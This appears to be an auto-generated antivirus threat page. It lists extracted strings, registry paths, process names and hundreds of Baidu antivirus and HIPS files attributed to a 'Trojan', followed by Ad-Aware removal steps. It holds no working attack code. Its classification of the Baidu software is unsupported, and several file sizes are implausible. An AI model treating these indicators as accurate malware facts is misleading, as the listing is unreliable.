HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
\GameNoDisturb.ini
d.d.d d:d
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
PluginSetup.xml
BaiduAnLOCAL_PLUGIN_MOD_MUTEX_{118A205F-4B51-4944-8384-93CC04727168}
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
{E2206DEE-0CAF-4337-8DA8-1EF057A426B8}
\PluginSetup.xml
PackCache_overall_plugin_update.xml
\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
IBDMUPDATE_{A2EBD9CD-6348-4980-B95F-202BE39A46F3}
{DCD4260B-CEED-4514-895D-CA0AF61DEA5E}
UninstalledPlugins.xml
\bdmantivirus\kavupdate.dll
BDMUpdate.dll
BDMNet.dll
eBaiduAnUpdate.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
/S /handle=%d /installmode=1
/S /handle=%d /installmode=1 /startmain=0
"{0}" {1}
SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
ic_info_64.png
ic_warning_48.png
ic_question_48.png
ic_done_48.png
BDMUpdateWnd.xml
BaiduAn.exe
BaiduAnTray.exe
btn_close_hover.png
btn_close_pressed.png
btn_ok_hover.png
btn_ok_pressed.png
ic_done_48_48.png
ic_info_48_48.png
important_tip
CommonRes.rdb
CommonMsgBox
CommonMsgBox.xml
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
ntdll.dll
EXPLORER.EXE
explorer.exe
file='skin_image16.png' xtiled='true' ytiled='true'
skin_image16.png
file='%s' xtiled='true' ytiled='true'
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
okernel32.dll
HKEY_USERS
xxxxxxxxxxxxxxxx
EKernel32.dll
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
GWintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
E{X-X-X-XX-XXXXXX}
D823ABCA-A92F-429d-9E11-3779B5F682AA
E##cmd:
\NotInstalledPlugin.xml
\HotPlugins.xml
\HotPlugin.bnr
{E5B65788-3C2C-4F59-92E7-58C9205BC66E}
BDMDownload.dll
BPackCache.xml
CUninstalledPlugins.xml
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
C.bdtmp
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
\Global.db
Diphlpapi.dll
D\\.\PhysicalDrive%d
\\.\Scsi%d:
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
3.0.0.3971
BaiduanUpdate.exe

services.exe_724_rwx_00040000_00001000:

%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll

svchost.exe_1084_rwx_018A0000_00001000:

%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    F1023_s_30803.exe:780
    BaiduHips.exe:3260
    BaiduHips.exe:320
    netsh.exe:2640
    BDKVWsc.exe:2568
    BDKVWsc.exe:2668
    RegSvr32.exe:2972
    RegSvr32.exe:2256
    RegSvr32.exe:560
    RegSvr32.exe:1232
    RegSvr32.exe:2360
    bddownloader.exe:2600
    bddownloader.exe:3792
    G1023_s_70904.exe:3576
    %original file name%.exe:716
    BaiduSdTray.exe:2844
    BaiduAnTray.exe:3824
    setup.exe:1056
    cacls.exe:1860
    MsiExec.exe:548
    MsiExec.exe:1968
    BaiduAnBugRpt.exe:916
    BDASWDeskGuide.exe:228
    baiduanTray.exe:3012
    BindEx.exe:1568
    BindEx.exe:1040
    setup.tmp:1976
    regsvr32.exe:2652
    regsvr32.exe:1520
    regsvr32.exe:2920
    BDALeakfixer.exe:3188
    BaiduAn.exe:3824
    BaiduAn.exe:1952
    BaiduSdBugRpt.exe:2180
    BaiduSdUpdate.exe:2680
    BaiduSdUpdate.exe:2228
    BaiduAnSvc.exe:3768
    BaiduAnSvc.exe:3664
    BaiduSdSvc.exe:1500

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMPatchAgent.dll (3104 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerXMLScript.dat (2 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\ad.dll (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSd.exe (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\res\InstallWnd.zip (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDCooly.dll (3312 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVMC.rdb (5520 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_customer.xml (75 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tips.xml (1 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\TrustAndIso.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_self_enc.xml (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\wverify.dat (15019 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsUpdate.exe (37 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\ToastLogo.ico (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vcrt.msi (22552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDPerflog.dll (10512 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMStringUtils.dll (63 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BSRLib.dat (5064 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Download\bdcomproxy.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDLogicUtils.dll (16864 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv2.tmp (1287722 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\NetService.ini (615 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\baidusdRepair.dll (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
    %Program Files%\Common Files\Baidu\BDDownload\108\bddownloader.exe (9605 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUProxy64.exe (4545 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDMAVEng.dll (4545 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDDriverFixer.dll (1281 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMNet.dll (5873 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsIU.dll (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSREng.dll (10136 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\CompatibilityChecker.dll (673 bytes)
    %Program Files%\Common Files\Baidu\BDDownload\108\bdcomproxy.dll (601 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMPatchAgent.dll (39 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\UserDetectionPlugin.dll (5520 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\systemfile.dat (3 bytes)
    %System%\config (576 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdUpdate.exe (7385 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\HIPSClient.dll (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMWindowsLib.dll (3312 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDPerflog.dll (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\monitor_config.dat (559 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\bd0001.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\BDKitUtils.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDMWrench.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0001.dll (4992 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Repair_PluginConfig.xml (411 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVRtp_PluginConfig.xml (2 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\virus_type.dat (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\bduf.dll (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrayPluginContainerConfig.xml (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\810.dat (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUpdate.exe (33263 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVWsc.exe (13368 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\GetSupplyId.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0002.sys (13168 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavFrame.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDownloadProtect_x64.dll (673 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0001.sys (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMWindowsLib.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMLog.dll (1552 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDLogicUtils.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\TrustAndIso.dll (13440 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHips.exe (8657 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanV.dll (2392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastLogo.ico (12024 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\blacksign.dat (852 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\vatl.msi (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSRCore.dll (10136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVFixerConfigMgr.dll (8560 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\804.dat (3 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\WebMonHook.dll (2105 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\InstallCfg.xml (177 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0002.dll (3073 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\GameNoDisturb.ini (215 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\uninst.exe (6841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHipsIU.dll (1856 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMTinyXml.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDUDiskGuard.dll (7192 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDKVDeskBand.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\tuopan.png (3 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMStringUtils.dll (63 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x64\bd0001.sys (673 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDPerflog.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\hips_self_enc.xml (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\806.dat (3 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDownload.dll (2105 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDLogicUtils.dll (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\TrustAndIso.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMFrameWork.dll (1425 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDShellExt64.dll (2321 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_customer.xml (75 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\cache_config.dat (469 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\wverify.dat (15019 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSd.exe (2105 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSDWrench.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVDeskBand.dll (5064 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMFrameWork.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\NetService.ini (1230 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayDldProtect.rdb (3616 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0001.sys (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMPatchAgent.dll (39 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\BDMSkin.dll (37727 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\hips_product.xml (291 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduHips.exe (38495 bytes)
    %System%\config\system (2566 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\KVInstallHelper.dll (16424 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\white_list.dat (2105 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVUpdate.rdb (13584 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\901.dat (8 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\blacksign.dat (852 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\ToastImage.png (5 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch.7z (7433 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerLuaScript.dat (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDLogicUtils.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDArKit.sys (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\SysFixerConfig.dat (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMAVCached.dll (1425 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMNet.dll (6841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdvs.dat (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanH.dll (1856 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\bd0001.sys (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bdmp.dat (1552 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\updlog.dll (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\kav_verify.dat (677 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\NetService.ini (615 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\vcrt.msi (4545 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMSkin.dll (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RtpContainerConfig.xml (818 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDDownLoadProtectPlugin.dll (16288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMAVCached.dll (23584 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmsysrepair\BDMSREng.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\monitor_config.dat (559 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\NetService.ini (615 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BaiduSdBugRpt.exe (4545 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\FTSysFixer\SysFixerConfig.dat (1 bytes)
    %Documents and Settings%\All Users\Desktop\百度杀毒.lnk (895 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\drivers\BDArKit.sys (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Download\dl.dll (14988 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BaiduHipsBugRpt.exe (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebMonHook.dll (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVMainframe_PluginConfig.xml (1 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMDownload.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\systemfile.dat (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\vatl.msi (6584 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\GCCallbackBind.dll (39 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\Cooly_PluginConfig.xml (726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMSDWrench.dll (3312 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\DesktopToast.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMRepMgr.dll (12088 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMTinyXml.dll (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdSvc.exe (27704 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMUpdate.dll (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPullUpWS.rdb (3616 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMScriptVM.dll (1281 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_product.xml (291 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKVVirusPlugins.dll (12088 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\KavUpdate.dll (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\Database\bdmp.dat (32 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\kav_verify.dat (677 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanH.dll (49 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\WebSafePlugin.dll (11344 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\uninst.exe (29256 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\TrayPlugin.rdb (9608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\bd0003.sys (1856 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMPatchAgent.dll (43 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\hips_self_enc.xml (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BDMDbSqlite.dll (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\duilib license.txt (1 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDMLog.dll (43 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BDConfig.dll (3073 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTray.rdb (1552 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x64\bd0002.sys (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\TrustAndIso.dll (1425 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\CoolyContainerConfig.xml (329 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\fm.dat (597 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\DriverManager.dll (8608 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\white_list.dat (12088 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsIU.dll (55 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVTips.rdb (2392 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\BaiduHipsBugRpt.exe (3361 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BavScanS.dll (2392 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\Cooly_PluginConfig.xml (726 bytes)
    %System%\drivers\bd0003.sys (55 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\systemfile.dat (3 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\bdkvtrayplugins\BDKVTrayTipsPlugin.dll (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\BDMBase.dll (7345 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\GCScriptBind.dll (7345 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\FileMon.dll (21216 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\patch\placeholder_tmp (11 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Download\7z.dll (2105 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\drivers\x86\bd0002.sys (673 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\DriverManager.dll (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDKitUtils.dll (2392 bytes)
    %Program Files%\Common Files\Baidu\BDDownload\108\dl.dll (14988 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMUpdate.dll (12104 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKV.rdb (3312 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\websafe\DllInject.dll (43 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\iexplore.exe.xml (528 bytes)
    %Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\dl.dll (65930 bytes)
    %Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\smr.dat (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\SearchProtection.rdb (5064 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\tuopan.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt.dll (14184 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMDownload.dll (15336 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\BAV\BavScanM.dll (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\plugins\KVMainframe_PluginConfig.xml (1 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\hipsengine\drivers\x86\bd0001.sys (601 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\scan_mgr_config.dat (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDShellExt64.dll (15168 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\placeholder_tmp (11 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\bdmantivirus\ccesign.dat (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsk3.tmp\file\BDMMsg.dll (1552 bytes)
    %Program Files%\baidu\BaiduSd\2.1.0.3086\Skins\Default\BDKVQuarantine.rdb (10 bytes)
